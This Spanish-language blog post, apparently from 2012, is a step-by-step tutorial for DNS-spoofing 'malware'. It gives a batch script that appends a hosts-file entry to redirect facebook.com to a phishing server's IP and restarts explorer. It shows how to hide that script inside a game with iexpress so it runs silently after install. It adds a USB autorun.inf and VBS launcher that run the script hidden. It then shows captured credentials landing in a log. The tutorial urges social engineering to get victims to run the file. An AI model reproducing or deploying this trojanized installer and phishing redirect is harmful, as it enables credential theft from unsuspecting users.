Dns Spoof Modificando Archivo hosts con "Malware" ~ HD_Breaker Seguridad Informatica

martes, 7 de agosto de 2012

Dns Spoof Modificando Archivo hosts con "Malware"


DNS Spoofing Malware


Bueno en este Tutorial Vamos a ver como realizar un DnsSpoof
atraves del Malware, Modificando el archivo Hosts, y redireccionando
una web a la ip que nosotros deseemos, veremos tambien como ejecutar
este malware desde un una Memoria Flash

El ataque DnsSpoof en el q nos basaremos sera el que modifica el archivo hosts
para eso crearemos un Malware q constara de 2 archivos en un caso y 4 en otro


Primer Caso:

Ingenieria Social.

Crearemos un malware q constara de 2 archivos
un batch q tendra el siguiente codigo (se guardara con la extencion .bat)


@echo off
echo "IP a la q sera redireccionado" "Sitio que redireccionaremos" >> %SystemRoot%\System32\drivers\etc\hosts
taskkill /f /IM explorer.exe
explorer.exe
exit


En mi caso direccionare facebook.com a un sitio Fake (Phishing)

DNSSPOOF.bat:

echo 190.169.22.51 facebook.com >> %SystemRoot%\system32\drivers\etc\hosts
taskkill /f /IM explorer.exe
explorer.exe
exit

Ahora Uniremos este Archivo con por Ejempo un juego portable de bajo peso,
yo elegi Packman.



Para realizar este proceso utilizaremos iexpress:
(No explicare como Funciona ahi mucha Info en Internet)

Agregamos los 2 Archivos:



aca la parte importante.


Install Program: Pondremos Packman.exe

Post Intall Command: Pondremos DNSSPOOF.bat



En Show Windows ponemos Hidden

En Packege Name and Options marcamos la Opcion Hide file Extracting Progress Animation from User

y lo Guardamos con el Nombre Packman2.exe

En Configure Restart ponemos NO RESTART

Esperamos q Termine la Comprecion

Cambiamos el Icono con ResHacker al q creamos combeniente (en este ejemplo no cambiare el icono)



Ahora ejecutamos para la prueba:



vemos que el juego se ejecuta correctamente, vamos al archivo hosts para ver si funciono.



borramos esta ultima linea porq obviamente nosotros no queremos ser las victimas :)

Ahora no queda mas q usar algo de Ingenieria Social para q la victima Descarge el Archivo y lo ejecute.

Segundo caso:

Ejecutando Archivo desde un PenDrive:

crearemos un archivo autorun.inf que contenga:

[autorun] 

action=Open Files On Folder
icon=USB.ico

shellexecute=Start.vbs

y un Start.vbs que contenga:

set objshell = createobject("wscript.shell")
objshell.run "DNSSPOOF.bat",vbhide

Colocamos DNSSPOOF.bat, Start.vbs, algun .ico q nos guste y el autorun.inf en el PenDrive



Listo Ahora al Conectar el PenDrive Automaticamente se Ejecutara Start.vbs, q a su ves Ejectura DNSSPOOF.bat y cambiara el archivo hosts

Veamos como funciona:

Visitamos facebook.com luego de ejecutar el Malware en la PC Victima (ya sea por cualquiera de los 2 Casos)
y vemos q nos manda a www.facebook.com (que realmente es un sitio Phishing)
Agregamos de Informacion User: pepe@hotmail.com pass: Owned



y le damos Entrar, nos redirecciona a www.facebook.com (sitio real de facebook)

vamos a nuestro servidor y revisamos el archivo log.txt



Espero Que Este Tutorial les sea de Ayuda, no me hago responsable por el uso que le puedan dar HD_Breaker

0 comentarios:

Publicar un comentario